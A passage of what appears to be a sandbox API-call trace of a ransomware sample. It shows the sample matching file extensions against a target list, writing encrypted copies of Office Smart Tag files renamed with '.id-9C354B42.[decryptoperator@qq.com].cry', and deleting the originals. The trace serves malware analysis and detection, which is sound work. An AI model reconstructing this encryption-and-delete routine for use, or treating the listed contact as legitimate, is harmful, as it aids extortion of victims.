Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.196] lstrlenW (lpString=".jpg") returned 4 [0042.196] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.196] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.196] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.196] lstrlenW (lpString=".doc") returned 4 [0042.196] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.196] lstrlenW (lpString=".docx") returned 5 [0042.197] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0042.197] lstrlenW (lpString=".pdf") returned 4 [0042.197] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.197] lstrlenW (lpString=".xls") returned 4 [0042.197] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.197] lstrlenW (lpString=".xlsx") returned 5 [0042.197] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0042.197] lstrlenW (lpString=".ppt") returned 4 [0042.197] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.197] lstrlenW (lpString=".zip") returned 4 [0042.197] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.197] lstrlenW (lpString=".rar") returned 4 [0042.197] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.197] lstrlenW (lpString=".bz2") returned 4 [0042.197] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.197] lstrlenW (lpString=".7z") returned 3 [0042.197] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.197] lstrlenW (lpString=".dbf") returned 4 [0042.197] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.197] lstrlenW (lpString=".1cd") returned 4 [0042.198] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.198] lstrlenW (lpString=".jpg") returned 4 [0042.198] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.198] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0042.198] lstrlenW (lpString="PHONE.XML") returned 9 [0042.198] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0042.476] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1844) returned 1 [0042.476] CloseHandle (hObject=0x1f0) returned 1 [0042.476] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml")) returned 0x20 [0042.476] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.476] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0042.476] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.476] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.476] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0042.477] GetLastError () returned 0x0 [0042.477] ReadFile (in: hFile=0x1f0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x734, lpOverlapped=0x0) returned 1 [0042.537] WriteFile (in: hFile=0x1f4, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x740, lpOverlapped=0x0) returned 1 [0042.538] ReadFile (in: hFile=0x1f0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.538] WriteFile (in: hFile=0x1f4, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.538] SetEndOfFile (hFile=0x1f4) returned 1 [0042.539] CloseHandle (hObject=0x1f4) returned 1 [0042.539] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.539] SetEndOfFile (hFile=0x1f0) returned 1 [0042.540] CloseHandle (hObject=0x1f0) returned 1 [0042.540] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0042.540] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml")) returned 1 [0042.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0042.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0042.540] lstrlenW (lpString=".doc") returned 4 [0042.540] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.540] lstrlenW (lpString=".docx") returned 5 [0042.540] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0042.540] lstrlenW (lpString=".pdf") returned 4 [0042.540] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.540] lstrlenW (lpString=".xls") returned 4 [0042.540] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.541] lstrlenW (lpString=".xlsx") returned 5 [0042.541] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0042.541] lstrlenW (lpString=".ppt") returned 4 [0042.541] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0042.541] lstrlenW (lpString=".zip") returned 4 [0042.541] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.541] lstrlenW (lpString=".rar") returned 4 [0042.541] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.541] lstrlenW (lpString=".bz2") returned 4 [0042.541] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.541] lstrlenW (lpString=".7z") returned 3 [0042.541] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0042.541] lstrlenW (lpString=".dbf") returned 4 [0042.541] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0042.541] lstrlenW (lpString=".1cd") returned 4 [0042.541] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0042.541] lstrlenW (lpString=".jpg") returned 4 [0042.541] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0042.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0042.541] lstrlenW (lpString=".doc") returned 4 [0042.541] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.541] lstrlenW (lpString=".docx") returned 5 [0042.541] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0042.541] lstrlenW (lpString=".pdf") returned 4 [0042.541] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.541] lstrlenW (lpString=".xls") returned 4 [0042.541] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.541] lstrlenW (lpString=".xlsx") returned 5 [0042.541] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0042.541] lstrlenW (lpString=".ppt") returned 4 [0042.541] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0042.541] lstrlenW (lpString=".zip") returned 4 [0042.542] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.542] lstrlenW (lpString=".rar") returned 4 [0042.542] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.542] lstrlenW (lpString=".bz2") returned 4 [0042.542] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.542] lstrlenW (lpString=".7z") returned 3 [0042.542] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0042.542] lstrlenW (lpString=".dbf") returned 4 [0042.542] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0042.542] lstrlenW (lpString=".1cd") returned 4 [0042.542] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0042.542] lstrlenW (lpString=".jpg") returned 4 [0042.542] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.542] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0042.542] lstrlenW (lpString="TIME.XML") returned 8 [0042.542] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0042.542] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=8564) returned 1 [0042.543] CloseHandle (hObject=0x1f0) returned 1 [0042.543] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml")) returned 0x20 [0042.543] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.543] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0042.543] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.543] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.543] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0042.543] GetLastError () returned 0x0 [0042.543] ReadFile (in: hFile=0x1f0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x2174, lpOverlapped=0x0) returned 1 [0042.571] WriteFile (in: hFile=0x1f4, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x2180, lpOverlapped=0x0) returned 1 [0042.572] ReadFile (in: hFile=0x1f0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.572] WriteFile (in: hFile=0x1f4, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0042.572] SetEndOfFile (hFile=0x1f4) returned 1 [0042.572] CloseHandle (hObject=0x1f4) returned 1 [0042.573] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.573] SetEndOfFile (hFile=0x1f0) returned 1 [0042.574] CloseHandle (hObject=0x1f0) returned 1 [0042.574] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0042.574] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml")) returned 1 [0042.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0042.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0042.574] lstrlenW (lpString=".doc") returned 4 [0042.574] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.574] lstrlenW (lpString=".docx") returned 5 [0042.574] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0042.574] lstrlenW (lpString=".pdf") returned 4 [0042.574] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.574] lstrlenW (lpString=".xls") returned 4 [0042.575] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.575] lstrlenW (lpString=".xlsx") returned 5 [0042.575] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0042.575] lstrlenW (lpString=".ppt") returned 4 [0042.575] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0042.575] lstrlenW (lpString=".zip") returned 4 [0042.575] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.575] lstrlenW (lpString=".rar") returned 4 [0042.575] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.575] lstrlenW (lpString=".bz2") returned 4 [0042.575] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.575] lstrlenW (lpString=".7z") returned 3 [0042.575] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0042.575] lstrlenW (lpString=".dbf") returned 4 [0042.575] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0042.575] lstrlenW (lpString=".1cd") returned 4 [0042.575] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0042.575] lstrlenW (lpString=".jpg") returned 4 [0042.575] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0042.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0042.575] lstrlenW (lpString=".doc") returned 4 [0042.575] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.575] lstrlenW (lpString=".docx") returned 5 [0042.575] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0042.575] lstrlenW (lpString=".pdf") returned 4 [0042.575] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.575] lstrlenW (lpString=".xls") returned 4 [0042.576] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.576] lstrlenW (lpString=".xlsx") returned 5 [0042.576] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0042.576] lstrlenW (lpString=".ppt") returned 4 [0042.576] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0042.576] lstrlenW (lpString=".zip") returned 4 [0042.576] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.576] lstrlenW (lpString=".rar") returned 4 [0042.576] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.576] lstrlenW (lpString=".bz2") returned 4 [0042.576] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.576] lstrlenW (lpString=".7z") returned 3 [0042.576] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0042.576] lstrlenW (lpString=".dbf") returned 4 [0042.576] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0042.576] lstrlenW (lpString=".1cd") returned 4 [0042.576] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0042.576] lstrlenW (lpString=".jpg") returned 4 [0042.576] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.576] lstrcmpiW (lpString1=".XSL", lpString2=".cry") returned 1 [0042.576] lstrlenW (lpString="BASMLA.XSL") returned 10 [0042.576] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0042.577] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=227311) returned 1 [0042.577] CloseHandle (hObject=0x1f0) returned 1 [0042.577] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl")) returned 0x20 [0042.578] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.578] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0042.578] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.578] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.578] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0042.578] GetLastError () returned 0x0 [0042.578] ReadFile (in: hFile=0x1f0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x377ef, lpOverlapped=0x0) returned 1 [0042.595] WriteFile (in: hFile=0x1f4, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x377f0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x377f0, lpOverlapped=0x0) returned 1 [0042.598] ReadFile (in: hFile=0x1f0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.598] WriteFile (in: hFile=0x1f4, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0042.598] SetEndOfFile (hFile=0x1f4) returned 1 [0042.599] CloseHandle (hObject=0x1f4) returned 1 [0042.600] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.601] SetEndOfFile (hFile=0x1f0) returned 1 [0042.602] CloseHandle (hObject=0x1f0) returned 1 [0042.602] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0042.603] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl")) returned 1 [0042.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0042.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0042.603] lstrlenW (lpString=".doc") returned 4 [0042.603] lstrcmpiW (lpString1=".doc", lpString2=".XSL") returned -1 [0042.603] lstrlenW (lpString=".docx") returned 5 [0042.603] lstrcmpiW (lpString1=".docx", lpString2="A.XSL") returned -1 [0042.603] lstrlenW (lpString=".pdf") returned 4 [0042.603] lstrcmpiW (lpString1=".pdf", lpString2=".XSL") returned -1 [0042.603] lstrlenW (lpString=".xls") returned 4 [0042.603] lstrcmpiW (lpString1=".xls", lpString2=".XSL") returned -1 [0042.603] lstrlenW (lpString=".xlsx") returned 5 [0042.603] lstrcmpiW (lpString1=".xlsx", lpString2="A.XSL") returned -1 [0042.603] lstrlenW (lpString=".ppt") returned 4 [0042.603] lstrcmpiW (lpString1=".ppt", lpString2=".XSL") returned -1 [0042.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0042.603] lstrlenW (lpString=".zip") returned 4 [0042.603] lstrcmpiW (lpString1=".zip", lpString2=".XSL") returned 1 [0042.603] lstrlenW (lpString=".rar") returned 4 [0042.603] lstrcmpiW (lpString1=".rar", lpString2=".XSL") returned -1 [0042.603] lstrlenW (lpString=".bz2") returned 4 [0042.603] lstrcmpiW (lpString1=".bz2", lpString2=".XSL") returned -1 [0042.603] lstrlenW (lpString=".7z") returned 3 [0042.603] lstrcmpiW (lpString1=".7z", lpString2="XSL") returned -1 [0042.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0042.603] lstrlenW (lpString=".dbf") returned 4 [0042.603] lstrcmpiW (lpString1=".dbf", lpString2=".XSL") returned -1 [0042.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0042.603] 